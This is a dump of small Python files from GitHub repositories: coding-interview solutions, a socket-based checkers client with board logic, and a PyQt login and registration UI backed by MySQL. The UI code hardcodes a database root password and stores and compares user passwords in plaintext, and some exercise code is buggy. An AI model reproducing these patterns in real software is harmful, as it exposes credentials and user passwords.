"text": "'''\nString segmentation\nYou are given a dictionary of words and a large input string.\nYou have to find out whether the input string can be completely segmented into the words of a given dictionary.\nThe following two examples elaborate on the problem further.\n\nGiven a dictionary of words.\n\napple\napple\npear\npie\nInput string of “applepie” can be segmented into dictionary words.\n\napple\npie\nInput string “applepeer” cannot be segmented into dictionary words.\n\napple\npeer\n'''\n\ndef can_segment_string(s, dictionary):\n map = dict()\n return can_segment_string_helper(s, dictionary, map)\n\ndef can_segment_string_helper(s, dictionary, map):\n if s == '':\n return True\n\n if s in map:\n return map[s]\n\n for i in range(len(s)+1):\n if s[0:i] in dictionary and can_segment_string(s[i:len(s)], dictionary):\n map[s[i:len(s)]] = True\n return True\n\n map[s] = False\n return False\n"
},
{
"alpha_fraction": 0.5710455775260925,
"alphanum_fraction": 0.5750670433044434,
"avg_line_length": 25.64285659790039,
"blob_id": "d37aa75e52c74f664d692808b3efa996012c5d2d",
"content_id": "35b2130af58419deb779b7d19a28ca1423331c91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 28,
"path": "/nWordPairs.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "''''\nGiven an array of words, find all possible 2-word pairs, where the words are adjacent.\nFor eg. if input is \"My name is Leo\", output should be: [[My, name], [name, is], [is, Leo]].\n'''\n\ndef nWordPairs(text, n=2):\n output = []\n pair = []\n words = text.split(\" \")\n for word in words:\n pair.append(word)\n\n if len(pair) == n:\n output.append(pair)\n pair = []\n pair.append(word)\n return output\n\n\nresults = nWordPairs(\"My name is Leo\")\nprint(results) # [[My, name], [name, is], [is, Leo]]\n\nresults = nWordPairs(\"My name is Nisal Perera\")\nprint(results) # [[My, name], [name, is], [is, Leo]]\n\n\nresults = nWordPairs(\"My name is Nisal Perera\", 3)\nprint(results) # [[My, name, is], [is, Nisal, Perera]]\n"
},
{
"alpha_fraction": 0.4510739743709564,
"alphanum_fraction": 0.45823389291763306,
"avg_line_length": 15.076923370361328,
"blob_id": "11668ed1a962f456867a4296c301a516ee57283a",
"content_id": "8aeb198a1ddbc31633fe92319c44bd269c135e27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 419,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 26,
"path": "/fibonacci_number.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\n Fibonacci Number implimentation\n with Memoization\n\n'''\nclass Solution(object):\n\n cache = {}\n def fib(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n\n if N in self.cache:\n return self.cache[N]\n\n if N < 2:\n return N\n else:\n result = self.fib(N -1) + self.fib(N -2)\n\n\n self.cache[N] = result\n\n return result\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 22.636363983154297,
"blob_id": "ef64c3b83b4e305bae170cc48ef58393ee8847a2",
"content_id": "1c7ed353502b52c23c971f5d855d650d9b4c9b79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 33,
"path": "/two_sum.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nYou can return the answer in any order.\n\n\n\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nOutput: Because nums[0] + nums[1] == 9, we return [0, 1].\n\n'''\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n hashMap = {}\n\n for i , num in enumerate(nums):\n if (target - num) in hashMap:\n return [hashMap[target - num], i]\n else:\n hashMap[num] = i\n"
},
{
"alpha_fraction": 0.7041420340538025,
"alphanum_fraction": 0.7041420340538025,
"avg_line_length": 31.14285659790039,
"blob_id": "de5fcb2c7fc89c51fc8c1ef3ef508ae7d4a65b05",
"content_id": "f55b9976ef6f8a07687e68857150d10549690557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 21,
"path": "/binary_tree.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\nDetermine if a binary tree is a binary search tree\nGiven a Binary Tree, figure out whether it’s a Binary Search Tree.\nIn a binary search tree, each node’s key value is smaller than the key value of all nodes in the right subtree,\nand is greater than the key values of all nodes in the left subtree. Below is an example of a binary tree that is a valid BST.\n\n'''\n\n\ndef is_bst(root, minVal=float('-inf'), maxVal=float('inf')):\n #TODO: Write - Your - Code\n\n if root is None:\n return True\n\n if root.data > minVal and root.data < maxVal and \\\n is_bst(root.left, minVal, root.data) and \\\n is_bst(root.right, root.data, maxVal):\n return True\n else:\n return False\n"
},
{
"alpha_fraction": 0.5526870489120483,
"alphanum_fraction": 0.5800843238830566,
"avg_line_length": 23.33333396911621,
"blob_id": "6d5d13eeb0e7bec50a3bf4c6184cc3bc6f3d7ee4",
"content_id": "7d5242cdb02e618e5a8fa36d5c6c0fb57a05b77a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1901,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 78,
"path": "/round4.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''Amazon tracks the errors that occur on its website very closely in order to identify bugs and quickly fix them.\nHowever, sometimes errors are a result of a sequence of actions rather than logic on a single page alone.\nHow would you create a program/system that parses a log file of page requests and error codes\nto identify the most common 3-page sequences that lead to an error on the third page?\n \nThe log file format is:\n<session ID>,<pageURL>,<errorCode>\n \nExample log file:\n\n[ [1,A,0],\n[1,B,0]\n2,B,0\n1,C,0\n1,F,1\n2,C,0\n8,G,0\n2,F,1\n8,J,0\n1,K,1]\n...\n \nResulting erring 3-page sequence:\nB->C->F (1)->K (1)->Y->H, with count of 2 occurrences in this example\n\n'''\n\na = { 1: [('A',0) , ('B',0) , ('C',0) , ('F', 1)], 2: [('B',0), ('C',0) , ('F', 1)] }\n\n\ndef sessionErrors(file):\n\n if file is None or len(file) == 0:\n return 'error'\n\n sessionDict = {}\n\n for key, line in file.items():\n sessionId = line[0]\n page = (line[1], line[2])\n\n if sessionId in sessionDict:\n sessionDict[sessionId] = sessionDict[sessionId].append(page)\n else:\n sessionDict[sessionId] = []\n sessionDict[sessionId] = sessionDict[sessionId].append(page)\n\n for key, value in sessionDict.items():\n\n if len(value) < 3:\n continue\n\n stack = [] # always has prev 3 items\n errors = []\n\n for i, session in enumerate(value):\n stack.append(session)\n\n if stack[2][1] == 1:\n errorSequence = (stack[0], stack[1], stack[2])\n errors.append(errorSequence)\n\n if i > 2:\n stack.pop(0)\n\n errerCount ={} # {(A,B,C): 3, (D.f.G): 5}\n\n for error in errors:\n\n if error in errerCount:\n errerCount[error] = errerCount[error] + 1\n else:\n errerCount[error] = 1\n\n\n return max(errerCount, value)\n\nsessionErrors(a)\n"
},
{
"alpha_fraction": 0.6427931785583496,
"alphanum_fraction": 0.6544315218925476,
"avg_line_length": 29.189189910888672,
"blob_id": "f6d1a9aca2180dd0611568435cda5ed0e518dcdd",
"content_id": "d55e95d173f885a25bedc2f808c2bf24479ffb7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 37,
"path": "/pins.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven a set of pins with attributes (pin id, height), write a function that takes the argument 'k'\n(determining the number of columns) and inserts the pins such that every pin goes into a column with least consumed height.\nIf there is a tie then insert into the left most column. (What would be the best way to solve this? I used a priority queue)\n'''\n\n\nfrom collections import defaultdict\nfrom random import randint\n\nclass Pins:\n\n def __init__(self, num_queues):\n self.queue = defaultdict(list)\n self.queue_length = defaultdict()\n\n for queue_num in range(1, num_queues+1):\n self.queue[queue_num] = []\n self.queue_length[queue_num] = 0\n\n def additem(self, id, height):\n sorted_lengths = sorted(self.queue_length.items(), key=lambda x: (x[1],x[0]))\n self.queue[sorted_lengths[0][0]].append(id)\n self.queue_length[sorted_lengths[0][0]] += height\n print(self.queue)\n print(self.queue_length)\n\n def printQueues(self):\n print(self.queue)\n\n\n\np = Pins(2)\np.additem('A', 3)\np.additem('B', 5)\np.additem('C', 1)\np.printQueues()\n"
},
{
"alpha_fraction": 0.5802469253540039,
"alphanum_fraction": 0.5837742686271667,
"avg_line_length": 24.772727966308594,
"blob_id": "33ae6b5e481bde02b95be1b6ada3fb830677acfc",
"content_id": "45cef71aa3418ee3a42dd8120bf360239f7ddf6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1134,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 44,
"path": "/quoted_tokens.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nYou are given a string containing a comma-separated list of\ntokens. Tokens may have zero length, contain internal commas,\nor be surrounded by double quotes (\"). Write a function that\nparses the string character-by-character and returns a list\nof tokens, preserving any quoted tokens.\n\nNotes:\n- All input will be well-formed.\n- Quote characters will never appear internally within tokens.\n- Quote characters should not appear in the final output.\n\nExamples:\n1) parse('apple,banana') = ['apple', 'banana']\n2) parse('\"a\",b,\"c,d\"') = ['a', 'b', 'c,d']\n3) parse(',,') = ['', '', '']\n4) parse('') = ['']\n\n'''\n\n\ndef parse(string):\n\n output = []\n inQuotes = False\n buffer = ''\n\n for char in string:\n if char == '\"':\n inQuotes = not inQuotes\n elif char == ',' and not inQuotes:\n output.append(buffer)\n buffer = ''\n else:\n buffer = buffer + char\n\n output.append(buffer)\n return output\n\n\nprint(parse('apple,banana')) #== ['apple', 'banana'])\nprint(parse('\"a\",b,\"c,d\"')) #== ['a', 'b', 'c,d'])\nprint(parse(',,')) #== ['', '', ''])\nprint(parse('')) #== [''])\n"
}
] | 32 |
AmitWin/Mini-Final-Project | https://github.com/AmitWin/Mini-Final-Project | a773d27d75ddab06dca30d29164c02c8ee0c1be4 | 02b45ee2eb1bf78da0a2f7abe0a30fb0f897ce39 | b8ce4bf6d2085383192af03090b34ddd25f960c2 | refs/heads/main | 2023-04-26T00:05:15.814509 | 2021-05-14T21:49:49 | 2021-05-14T21:49:49 | 360,296,363 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5036437511444092,
"alphanum_fraction": 0.5174089074134827,
"avg_line_length": 27.06818199157715,
"blob_id": "6731d91d2aa19b9ce3eeaed2e350731aa1e74a38",
"content_id": "94bbc57a0d592808c24c1111c58a0da02d076d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3705,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 132,
"path": "/client.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import socket\nimport pickle\nimport time\nfrom checkers import *\nimport threading\nfrom board import Board\nimport pygame as pg\nfrom info import boardWidth, boardHeight\n\n\nclass Client(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.host = \"localhost\"\n self.port = 5555\n self.addr = (self.host, self.port)\n self.color = None\n self.board = None\n\n def run(self):\n self.connect()\n self.connect_to_lobby()\n\n def connect_to_lobby(self):\n # safety!!\n lobbyId = input(\"Do you want to Create lobby or Join one (C, J)\")\n if lobbyId == \"C\":\n self.server.send(b\"-1\")\n elif lobbyId == \"J\":\n lobbyId = input(\"Enter id number\")\n self.server.send(lobbyId.encode())\n\n data = self.server.recv(1024).decode()\n if \"Creating New Lobby\" in data:\n print(data)\n elif data == \"Joining Into an Existing Lobby\":\n print(data)\n\n self.play()\n\n def play(self):\n global board, turn, currentPlayer\n self.server.recv(1024) # Received that game started\n\n color = self.server.recv(1024).decode()\n self.color = color.split(\":\")[-1]\n currentPlayer = 1 if self.color == \"w\" else -1\n\n if self.color == \"w\":\n turn = True\n else:\n board = self.server.recv(1024 * 32)\n board = pickle.loads(board)\n turn = True\n\n while True:\n if not turn:\n newBoard = pickle.dumps(board)\n self.server.send(newBoard)\n board = self.server.recv(1024 * 32)\n board = pickle.loads(board)\n turn = True\n\n \"\"\"\n board = self.server.recv(1024 * 32)\n self.board = pickle.loads(board)\n\n while not self.board.winner:\n turn = self.server.recv(1024).decode()\n turn = turn.decode()\n turn = turn.split(\" \")[2]\n if turn == self.color:\n board = self.server.recv(1024 * 32)\n board = pickle.loads(board)\n #playing\n board = pickle.dumps(board)\n self.server.send(board)\n \"\"\"\n\n def connect(self):\n try:\n self.server.connect(self.addr)\n except:\n print(\"Basasa\")\n\n def disconnect(self):\n self.server.close()\n\n\ndef main():\n client = Client()\n client.start()\n\n # Initiate Windows\n win = pg.display.set_mode((boardWidth, boardHeight))\n pg.display.set_caption(\"Checkers\")\n\n global turn, board, currentPlayer\n board = Board()\n turn = False\n run = True\n clock = pg.time.Clock()\n while run:\n clock.tick(27)\n\n RedrawGameWindow(board, win)\n\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if turn:\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n clickedPiece = ValidClicked(mousePos, currentPlayer)\n while clickedPiece:\n board.update_moves(clickedPiece)\n clickedPiece = board.move(clickedPiece, win)\n if clickedPiece == \"moved\":\n turn = False\n clickedPiece = None\n\n RedrawGameWindow(board, win)\n pg.quit()\n\n\nif __name__ == '__main__':\n if __name__ == '__main__':\n if __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 20,
"blob_id": "ffbf6570dc430554264eea6ad450aaf3cf8eecd6",
"content_id": "10e8c060a9b5709e6993b9be17f480438515f482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# Mini-Final-Project"
},
{
"alpha_fraction": 0.4725706875324249,
"alphanum_fraction": 0.4854896068572998,
"avg_line_length": 36.879432678222656,
"blob_id": "b598fe207fb83d82ae0d2d89f67c001149587af7",
"content_id": "628f90c5060b7e3afb0b7a09ee7fba7816edc6cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5341,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 141,
"path": "/board.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nfrom piece import Piece\nfrom info import yellow, blue, sqr_height, sqr_width, rows, cols, radius, adjust_location, clicked, adjust_position\nimport time\n\nclass Board():\n def __init__(self):\n self.board = []\n\n self.ready = False\n self.last = None\n self.copy = True\n\n self.p1Name = \"Player 1\"\n self.p2Name = \"Player 2\"\n\n self.turn = \"w\"\n\n self.winner = None\n\n self.start_user = None\n\n self.initiateBoard()\n\n def initiateBoard(self):\n for row in range(rows):\n self.board.append([])\n for col in range(cols):\n if col % 2 == ((row + 1) % 2):\n if row < 3:\n self.board[row].append(Piece([row, col], True))\n elif row > 4:\n self.board[row].append(Piece([row, col], False))\n else:\n self.board[row].append(0)\n else:\n self.board[row].append(0)\n\n def draw(self, win):\n for i in range(rows):\n for j in range(cols):\n if (i + j) % 2 == 0:\n pg.draw.rect(win, yellow, (sqr_width * i, sqr_height * j, sqr_width, sqr_height))\n elif (i + j) % 2 == 1:\n pg.draw.rect(win, blue, (sqr_width * i, sqr_height * j, sqr_width, sqr_height))\n\n def update_moves(self, piece):\n checker = lambda x, y: 0 <= x + y < 8\n piece.possibleLocations = []\n column, row = piece.col, piece.row\n if self.board[row][column] != 0:\n vectors = [[1, -1], [1, 1]] if self.board[row][column].black else [[-1, -1], [-1, 1]]\n if self.board[row][column].queen:\n vectors = [[1, -1], [1, 1], [-1, -1], [-1, 1]]\n for vector in vectors:\n rowVector, columnVector = vector\n if checker(columnVector, column) and checker(rowVector, row):\n if self.board[row + rowVector][column + columnVector] == 0:\n piece.possibleLocations.append([row + rowVector, columnVector + column])\n elif self.board[row + rowVector][column + columnVector] != 0 and \\\n self.board[row + rowVector][column + columnVector].white != self.board[row][column].white:\n if checker((2 * columnVector), column) and checker((2 * rowVector), row) \\\n and self.board[2 * rowVector + row][2 * columnVector + column] == 0:\n piece.possibleLocations.append([2 * rowVector + row, 2 * columnVector + column])\n\n def select(self, row, col):\n return self.move(self.board[row][col])\n\n def move(self, piece, win):\n pressed = False\n while not pressed:\n piece.highlight_possible_location(win)\n\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n mouseLoc = adjust_position(mousePos)\n if mouseLoc in piece.possibleLocations:\n self.board[piece.row][piece.col] = 0\n\n if abs(mouseLoc[0] - piece.row) == 2 or abs(mouseLoc[1] - piece.col) == 2:\n self.board[(mouseLoc[0] + piece.row) // 2][(mouseLoc[1] + piece.col) // 2] = 0\n\n self.update_location(piece, mouseLoc)\n piece.checks_if_become_queen()\n\n return \"moved\"\n elif self.board[mouseLoc[0]][mouseLoc[1]] != 0 \\\n and self.board[mouseLoc[0]][mouseLoc[1]].white == piece.white:\n return self.board[mouseLoc[0]][mouseLoc[1]]\n pressed = True\n\n piece.possibleLocations = []\n return None\n\n def update_location(self, piece, location):\n self.board[location[0]][location[1]] = piece\n piece.change_pos(location)\n\n def checks_if_someone_won(self):\n black = 0\n white = 0\n for row in rows:\n for col in cols:\n if self.board[row][col].white:\n white += 1\n elif self.board[row][col].black:\n black += 1\n\n if black == 0:\n self.winner = \"w\"\n return True\n elif white == 0:\n self.winner = \"b\"\n return True\n\n return False\n \"\"\"\n def turn(self):\n 
keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n clickedPiece = ValidClicked(mousePos, currentPlayer)\n while clickedPiece:\n board.update_moves(clickedPiece)\n clickedPiece = board.move(clickedPiece, win)\n if clickedPiece == \"moved\":\n currentPlayer *= -1\n clickedPiece = None\n\n RedrawGameWindow(win)):\n \n \"\"\"\n"
},
{
"alpha_fraction": 0.5825275182723999,
"alphanum_fraction": 0.6009107232093811,
"avg_line_length": 43.58145523071289,
"blob_id": "633e7f06efbc5fa9b6d1ca92af1a927a1c8924fb",
"content_id": "03591fbc5fc4c165200b791cd2d357f6cbd12ac9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17788,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 399,
"path": "/UI/UI.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'UI.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox\nimport mysql.connector\n\ndb = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='wamit112233',\n database='LoginSystem'\n )\n\nmycursor = db.cursor()\n\n#mycursor.execute('CREATE TABLE Users (ID int PRIMARY KEY NOT NULL AUTO_INCREMENT, username VARCHAR(50) NOT NULL, password VARCHAR(50) NOT NULL, first_name VARCHAR(50) NOT NULL, last_name VARCHAR(50) NOT NULL, birth_year int NOT NULL, email VARCHAR(50) NOT NULL)')\n\nclass Ui_MainWindow(QMainWindow):\n def openWindow(self):\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_RegisterWindow()\n self.ui.setupUi(self.window)\n self.window.show()\n self.LogInPage.close()\n\n def openChess(self):\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_ChessOptions()\n self.ui.setupUi(self.window)\n self.window.show()\n self.LogInPage.close()\n\n def setupUi(self, LogInPage):\n self.LogInPage = LogInPage\n LogInPage.setObjectName(\"LogInPage\")\n LogInPage.setEnabled(True)\n LogInPage.resize(600, 400)\n LogInPage.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(LogInPage)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.UserName = QtWidgets.QLineEdit(self.centralwidget)\n self.UserName.setGeometry(QtCore.QRect(150, 125, 300, 35))\n self.UserName.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"\")\n self.UserName.setObjectName(\"UserName\")\n self.Password = QtWidgets.QLineEdit(self.centralwidget)\n self.Password.setGeometry(QtCore.QRect(150, 170, 300, 35))\n self.Password.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"\")\n self.Password.setObjectName(\"Password\")\n self.Submit = QtWidgets.QPushButton(self.centralwidget)\n self.Submit.setGeometry(QtCore.QRect(200, 230, 200, 35))\n self.Submit.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.Submit.setObjectName(\"Submit\")\n self.NewUser = QtWidgets.QPushButton(self.centralwidget)\n self.NewUser.setGeometry(QtCore.QRect(200, 270, 200, 35))\n self.NewUser.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.NewUser.setObjectName(\"NewUser\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(220, 30, 141, 71))\n self.label.setStyleSheet(\"color:white;\\n\"\n\"font:bold 25px;\\n\"\n\"\")\n self.label.setObjectName(\"label\")\n self.Password.raise_()\n self.UserName.raise_()\n self.Submit.raise_()\n self.NewUser.raise_()\n self.label.raise_()\n LogInPage.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(LogInPage)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n 
self.menubar.setObjectName(\"menubar\")\n LogInPage.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(LogInPage)\n self.statusbar.setObjectName(\"statusbar\")\n LogInPage.setStatusBar(self.statusbar)\n self.Submit.clicked.connect(lambda x: self.log_in())\n self.NewUser.clicked.connect(lambda x: self.openWindow())\n self.retranslateUi(LogInPage)\n QtCore.QMetaObject.connectSlotsByName(LogInPage)\n\n def log_in(self):\n username = self.UserName.text()\n password = self.Password.text()\n if self.Is_User_Exists(username, password):\n self.openChess()\n\n def Is_User_Exists(self, user, passw):\n correct_info = 0\n mycursor.execute(\"SELECT username, password FROM Users\")\n for (existUser, existPasssw) in mycursor:\n if existUser == user and existPasssw == passw:\n return True\n return False\n\n def retranslateUi(self, LogInPage):\n _translate = QtCore.QCoreApplication.translate\n LogInPage.setWindowTitle(_translate(\"LogInPage\", \"Log in Page\"))\n self.UserName.setPlaceholderText(_translate(\"LogInPage\", \"Enter Username\"))\n self.Password.setPlaceholderText(_translate(\"LogInPage\", \"Enter Password\"))\n self.Submit.setText(_translate(\"LogInPage\", \"Submit\"))\n self.NewUser.setText(_translate(\"LogInPage\", \"New User\"))\n self.label.setText(_translate(\"LogInPage\", \"Login Page\"))\n\n\nclass Ui_RegisterWindow(QMainWindow):\n def openWindow(self):\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self.window)\n self.window.show()\n self.Registration.close()\n\n def setupUi(self, Registration):\n self.Registration = Registration\n Registration.setObjectName(\"Registration\")\n Registration.resize(600, 400)\n Registration.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(Registration)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.RegisterLabel = QtWidgets.QLabel(self.centralwidget)\n self.RegisterLabel.setGeometry(QtCore.QRect(215, 10, 170, 50))\n self.RegisterLabel.setStyleSheet(\"color:white;\\n\"\n \"font:bold 35px;\\n\"\n \"\")\n self.RegisterLabel.setObjectName(\"RegisterLabel\")\n self.FirstName = QtWidgets.QLineEdit(self.centralwidget)\n self.FirstName.setGeometry(QtCore.QRect(70, 80, 200, 40))\n self.FirstName.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.FirstName.setObjectName(\"FirstName\")\n self.BirthYear = QtWidgets.QLineEdit(self.centralwidget)\n self.BirthYear.setGeometry(QtCore.QRect(70, 150, 200, 40))\n self.BirthYear.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.BirthYear.setObjectName(\"BirthYear\")\n self.Username = QtWidgets.QLineEdit(self.centralwidget)\n self.Username.setGeometry(QtCore.QRect(70, 220, 200, 40))\n self.Username.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.Username.setObjectName(\"Username\")\n self.LastName = QtWidgets.QLineEdit(self.centralwidget)\n self.LastName.setGeometry(QtCore.QRect(340, 80, 200, 40))\n self.LastName.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n 
\"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.LastName.setObjectName(\"LastName\")\n self.EmailAdress = QtWidgets.QLineEdit(self.centralwidget)\n self.EmailAdress.setGeometry(QtCore.QRect(340, 150, 200, 40))\n self.EmailAdress.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.EmailAdress.setObjectName(\"EmailAdress\")\n self.Password = QtWidgets.QLineEdit(self.centralwidget)\n self.Password.setGeometry(QtCore.QRect(340, 220, 200, 40))\n self.Password.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.Password.setObjectName(\"Password\")\n self.Register = QtWidgets.QPushButton(self.centralwidget)\n self.Register.setGeometry(QtCore.QRect(200, 280, 200, 35))\n self.Register.setStyleSheet(\"background-color:red;\\n\"\n \"color:white;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\\n\"\n \"border-color:black;\\n\"\n \"\")\n self.Register.setObjectName(\"Register\")\n self.Back = QtWidgets.QPushButton(self.centralwidget)\n self.Back.setGeometry(QtCore.QRect(200, 330, 200, 35))\n self.Back.setStyleSheet(\"background-color:red;\\n\"\n \"color:white;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\\n\"\n \"border-color:black;\\n\"\n \"\")\n self.Back.setObjectName(\"Back\")\n Registration.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(Registration)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n Registration.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(Registration)\n self.statusbar.setObjectName(\"statusbar\")\n Registration.setStatusBar(self.statusbar)\n self.retranslateUi(Registration)\n self.Back.clicked.connect(lambda x: self.openWindow())\n QtCore.QMetaObject.connectSlotsByName(Registration)\n self.Register.clicked.connect(lambda x: self.RegistrationToDB())\n\n def RegistrationToDB(self):\n exist = False\n firstName = self.FirstName.text()\n lastName = self.LastName.text()\n birthYear = self.BirthYear.text()\n email = self.EmailAdress.text()\n username = self.Username.text()\n password = self.Password.text()\n try:\n birthYear = int(birthYear)\n except:\n self.InvalidBirthYearPopUp()\n exist = True\n if not exist:\n mycursor.execute(\"SELECT username, password, first_name, last_name, birth_year, email FROM Users\")\n for (exist_user, exist_passw, exist_first_name, exist_last_name, exist_birth_year, exist_email) in mycursor:\n if exist_user == username:\n self.UsernameExistPopUp()\n exist = True\n elif exist_email == email:\n 